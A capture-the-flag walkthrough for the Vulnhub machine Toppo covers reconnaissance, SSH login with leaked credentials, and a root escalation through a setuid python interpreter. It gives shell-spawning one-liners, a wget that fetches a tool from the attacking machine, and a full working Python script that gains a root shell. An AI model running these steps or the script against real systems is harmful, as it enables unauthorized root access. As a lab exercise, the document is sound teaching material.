Today’s writeup is a machine called Toppo from Vulnhub. Toppo is rated at beginner level and is fairly simple to root. Depending on how you go about the privilege escalation, it could throw you off a bit.
I started off by running a typical nmap scan (nmap -sV -sC -v 192.168.2.92 -oN map1). It has SSH and HTTP (port 80) open. Let's check out the web page.
Here we have a blog site, but not much else. Let’s run a directory brute force to see if anything else can be found.
Running gobuster against the web root provides us with an interesting admin directory: gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u 192.168.2.92 (that is gobuster 2.x syntax; gobuster 3.x wants the dir subcommand first, i.e. gobuster dir -u ... -w ...).
In the admin directory are some notes.
The notes give us a username and password, but don't say what they're for. Let's try them out on SSH.
SSH worked!
Checking some basics like the bash history and sudo permissions doesn't yield anything, so I used wget to bring over linuxprivchecker.py and ran it. Serve the script from the attacking machine (192.168.2.30 here) and fetch it on Toppo:
python -m SimpleHTTPServer 80 (on the attacking machine)
wget 192.168.2.30/linuxprivchecker.py (on Toppo)
When running the script something interesting happened: it said I was already root.
What's happening here is that the python interpreter on Toppo runs as root even when ted executes it, which in practice means the binary is setuid root (confirm with ls -l /usr/bin/python* or find / -perm -4000 -type f 2>/dev/null; a setuid file shows an s in the owner's execute position). linuxprivchecker runs its checks through that interpreter, so its user checks reported root and it could read /etc/shadow. If python has an effective UID of 0, a shell spawned from python should inherit it:
python -c 'import pty; pty.spawn("/bin/bash")'
Ok so what went wrong? The script clearly ran as root (it even dumped the shadow file), so why didn't we get a root shell? Something's not right. Let's try it again with sh: same one-liner, but spawn /bin/sh instead of /bin/bash.
Ok that worked. Now we're root. The reason is not that bash "always runs as ted": a setuid binary only raises the effective UID, the real UID is still ted, and bash deliberately drops the effective UID back to the real one whenever the two differ, unless it is started with -p. The sh on this box doesn't do that, so it keeps effective UID 0. Spawning bash -p instead, or calling os.setuid(0) in the python one-liner before spawning any shell (which makes the real UID 0 too), would have worked just as well. Now we can get the flag.
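To make the real/effective UID distinction concrete, here is an added example of my own (not code from the writeup and not part of linuxprivchecker). It finds setuid-root files the way the find command above does, predicts whether a given shell will keep effective UID 0, and, when run through a setuid-root interpreter, makes the real UID 0 before exec'ing a shell so bash no longer drops privileges. The directories scanned, the shell path and the "dash keeps euid, bash drops it unless -p" rule are my assumptions; nothing else about the box is assumed. It is written to run under both Python 2 and 3, since the interpreter on the target may be 2.x.

```python
#!/usr/bin/env python
"""Added example: root shell from a setuid-root Python interpreter.

Assumed (not stated on the page): the interpreter file is owned by root with
the setuid bit set (mode 4755), and /bin/sh on the box is a shell that keeps
the effective UID (dash does; bash does not, unless started with -p).
"""
import os
import stat


def is_setuid_root(mode, uid):
    """True if stat() results show a file owned by root with the setuid bit set."""
    return bool(mode & stat.S_ISUID) and uid == 0


def find_setuid_root(dirs=("/usr/bin", "/usr/local/bin", "/bin")):
    """Return regular files under dirs that are setuid root.

    Equivalent to 'find <dirs> -perm -4000 -user root -type f', skipping
    anything we cannot stat. The directory list is an assumption; widen it
    (or use '/') on a real engagement.
    """
    hits = []
    for d in dirs:
        for root, _subdirs, files in os.walk(d):
            for name in files:
                path = os.path.join(root, name)
                try:
                    st = os.lstat(path)
                except OSError:
                    continue  # unreadable or vanished; ignore
                if stat.S_ISREG(st.st_mode) and is_setuid_root(st.st_mode, st.st_uid):
                    hits.append(path)
    return hits


def shell_keeps_root(ruid, euid, argv):
    """Predict whether spawning argv from a process with (ruid, euid) yields root.

    bash resets euid to ruid when they differ unless given -p; sh (dash) keeps
    euid. Once ruid is already 0 (after os.setuid(0)) every shell is fine.
    """
    if euid != 0:
        return False
    if ruid == 0:
        return True
    if os.path.basename(argv[0]) == "bash":
        return "-p" in argv[1:]
    return True


def escalate(shell="/bin/bash"):
    """Turn euid 0 into a full root shell. Only meaningful under a setuid interpreter."""
    ruid, euid = os.getuid(), os.geteuid()
    if euid != 0:
        raise OSError("interpreter is not setuid root (ruid=%d euid=%d)" % (ruid, euid))
    # Make the real IDs 0 as well; bash then sees ruid == euid and keeps root.
    os.setgid(0)
    os.setuid(0)
    os.execv(shell, [shell])


if __name__ == "__main__":
    print("setuid-root files: %s" % find_setuid_root())
    ruid, euid = os.getuid(), os.geteuid()
    print("ruid=%d euid=%d" % (ruid, euid))
    for argv in (["/bin/bash"], ["/bin/bash", "-p"], ["/bin/sh"]):
        print("%-14s keeps root: %s" % (" ".join(argv), shell_keeps_root(ruid, euid, argv)))
    if euid == 0:
        escalate()
```

Run it with the setuid interpreter (for example /usr/bin/python2.7 suid_shell.py on a box like Toppo); run with a normal interpreter it just lists the setuid-root files and explains why each shell would or wouldn't keep root.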
That’s Toppo. It’s a basic and quick box to pop. If you used sh with python from the start, you’d completely miss the weird bash issue. Another way to do it would have been to spawn a python reverse shell. Alternatively, it might have been possible to crack the root password from the shadow file dump (after running linuxprivchecker), but I didn’t try it.
If you’d like to see a video walkthrough with the python reverse shell, you can find it here.
Hope you found this helpful.
-R3a50n